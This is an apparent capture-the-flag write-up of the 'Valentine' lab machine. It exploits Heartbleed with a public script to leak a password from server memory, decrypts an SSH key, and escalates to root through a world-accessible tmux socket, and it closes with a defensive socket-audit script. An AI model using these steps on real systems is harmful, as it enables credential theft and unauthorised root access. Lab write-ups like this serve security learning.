*The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. This weakness allows stealing the information protected, under normal conditions, by the SSL/TLS encryption used to secure the Internet. The Heartbleed bug allows anyone on the Internet to read the memory of the systems protected by the vulnerable versions of the OpenSSL software. This compromises the secret keys used to identify the service providers and to encrypt the traffic, the names and passwords of the users and the actual content. This allows attackers to eavesdrop on communications, steal data directly from the services and users and to impersonate services and users. (https://heartbleed.com/#:~:text=The%20Heartbleed%20Bug%20is%20a,used%20to%20secure%20the%20Internet.)*

If the data of the encryption and decryption service is also processed server-side, then we could leak previous requests to it, as they could still remain in memory! Maybe it contains some valuable information. Let's try it!

## Gaining an Initial Foothold

As there exist tons of already working scripts, we can simply use one of them, e.g. [this one](https://gist.github.com/eelsivart/10174134).

```
└──╼ $ python2 heartbleed.py 10.129.1.190 -p 443

defribulator v1.16
A tool to test and exploit the TLS heartbeat vulnerability aka heartbleed (CVE-2014-0160)

##################################################################
Connecting to: 10.129.1.190:443, 1 times
Sending Client Hello for TLSv1.0
Received Server Hello for TLSv1.0

WARNING: 10.129.1.190:443 returned more data than it should - server is vulnerable!
Please wait... connection attempt 1 of 1
##################################################################

.@....SC[...r....+..H...9...
....w.3....f...
...!.9.8.........5...............
.........3.2.....E.D...../...A.................................I.........
...........
...................................#.......0.0.1/decode.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 42

$text=aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg==...r.i...u........yO
```

And indeed! It dumps memory of a previously requested decoding/encoding by another user!

Let's decode it and see what the plaintext is:

```
echo "aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg==" | base64 -d

heartbleedbelievethehype
```

This looks like a password! As we have an encrypted RSA key, which was stored in `hype_key`, we can now also safely assume that the username is probably `hype`.

Using openssl and the obtained password, we can now decrypt the key.

```
openssl rsa -in encrpted_key -out hype_ssh_key
```

Afterwards we use it to connect to the server as user hype.

```
ssh -i hype_ssh_key hype@10.129.1.190

hype@Valentine:~$ hostname && id
Valentine
uid=1000(hype) gid=1000(hype) groups=1000(hype),24(cdrom),30(dip),46(plugdev),124(sambashare)
```

## Privilege Escalation

Running linpeas, we see that root has an open tmux session whose socket is located at `/.dev/dev_sess`. As our user has permissions on that file, we can simply attach to it with:

```
tmux -S /.dev/dev_sess
```

And we are root!

```
root@Valentine:/.devs# hostname && id
Valentine
uid=0(root) gid=0(root) groups=0(root)
```
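The privilege escalation above works only because root's tmux server socket was reachable by another user. As an added example (not part of the original writeup), here is a small audit that walks a directory tree for UNIX sockets owned by someone else that the caller could still connect to, together with a constructed scenario that creates a socket named like the one on the box and checks it before and after hardening its mode. Function names are this example's own.

```python
# Added example (not from the original writeup): audit a directory tree for
# UNIX sockets, such as tmux or screen server sockets, that belong to another
# user but are still reachable by the caller, the condition that let hype
# attach to root's session. Function names are this example's own.
import os
import socket
import stat
import tempfile
from typing import List, Set, Tuple


def socket_is_exposed(st: os.stat_result, caller_uid: int, caller_gids: Set[int]) -> bool:
    """connect() on a UNIX socket requires write permission on the socket file,
    so flag sockets of other users that are world-writable, or group-writable
    for a group the caller belongs to."""
    if st.st_uid == caller_uid:
        return False
    if st.st_mode & stat.S_IWOTH:
        return True
    return st.st_gid in caller_gids and bool(st.st_mode & stat.S_IWGRP)


def find_exposed_sockets(root: str, caller_uid: int, caller_gids: Set[int]) -> List[Tuple[str, str]]:
    """Walk root and return (path, octal mode) for every exposed socket."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:  # os.walk puts non-directory entries, sockets included, here
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISSOCK(st.st_mode) and socket_is_exposed(st, caller_uid, caller_gids):
                hits.append((path, oct(stat.S_IMODE(st.st_mode))))
    return hits


def demo() -> Tuple[int, int]:
    """Constructed scenario: a server socket named like the one in the writeup,
    audited as a different user, first world-writable and then owner-only."""
    with tempfile.TemporaryDirectory() as tmp:
        path = os.path.join(tmp, "dev_sess")
        srv = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
        srv.bind(path)
        other_uid = os.getuid() + 1  # pretend the auditor is not the socket's owner
        os.chmod(path, 0o777)        # permissive mode: anyone can attach
        exposed = len(find_exposed_sockets(tmp, other_uid, set()))
        os.chmod(path, 0o700)        # hardened: only the owner can attach
        hardened = len(find_exposed_sockets(tmp, other_uid, set()))
        srv.close()
        return exposed, hardened
```

Running `find_exposed_sockets("/", os.getuid(), set(os.getgroups()))` on a live host lists the sockets a real audit would flag; `demo()` returns `(1, 0)`.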